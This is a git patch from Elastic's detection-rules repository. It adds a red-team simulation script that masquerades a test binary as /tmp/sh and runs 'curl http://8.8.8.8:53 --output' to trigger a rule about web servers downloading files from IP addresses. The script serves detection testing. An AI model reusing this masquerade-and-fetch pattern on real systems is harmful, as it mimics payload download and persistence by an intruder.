From 3ba231a4ba9c4f81941e05ed2372baf30bccd6a4 Mon Sep 17 00:00:00 2001 From: protections machine <72879786+protectionsmachine@users.noreply.github.com> Date: Wed, 23 Oct 2024 20:45:56 +1100 Subject: [PATCH] Sync RTA File Downloaded from Suspicious Source by Web Server (#4192) Co-authored-by: shashank-elastic <91139415+shashank-elastic@users.noreply.github.com> (cherry picked from commit c5b108400c7b78f1ab75e7dd4b54905e13d2e5e9) --- ...ce_webserver_curl_wget_download_ip_args.py | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 rta/linux_persistence_webserver_curl_wget_download_ip_args.py diff --git a/rta/linux_persistence_webserver_curl_wget_download_ip_args.py b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py new file mode 100644 index 00000000000..811239ba8f7 --- /dev/null +++ b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py @@ -0,0 +1,40 @@ +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0; you may not use this file except in compliance with the Elastic License +# 2.0. + +import sys +from . import RtaMetadata, common + +metadata = RtaMetadata( + uuid="8b7461f9-d569-4558-a4cf-7e476210eae8", + platforms=["linux"], + endpoint=[ + { + "rule_name": "File Downloaded from Suspicious Source by Web Server", + "rule_id": "14f332f1-b20b-4628-b6de-14a4626fba79", + }, + ], + techniques=["T1505", "T1059", "T1071"], +) + + +@common.requires_os(*metadata.platforms) +def main() -> None: + common.log("Creating a fake executable..") + masquerade = "/tmp/sh" + + source = common.get_path("bin", "linux.ditto_and_spawn") + common.copy_file(source, masquerade) + common.log("Granting execute permissions...") + common.execute(["chmod", "+x", masquerade]) + + commands = [masquerade, '-c', 'curl http://8.8.8.8:53 --output'] + common.execute([*commands], timeout=5, kill=True) + common.log("Cleaning...") + common.remove_file(masquerade) + common.log("Simulation successfull!") + + +if __name__ == "__main__": + sys.exit(main())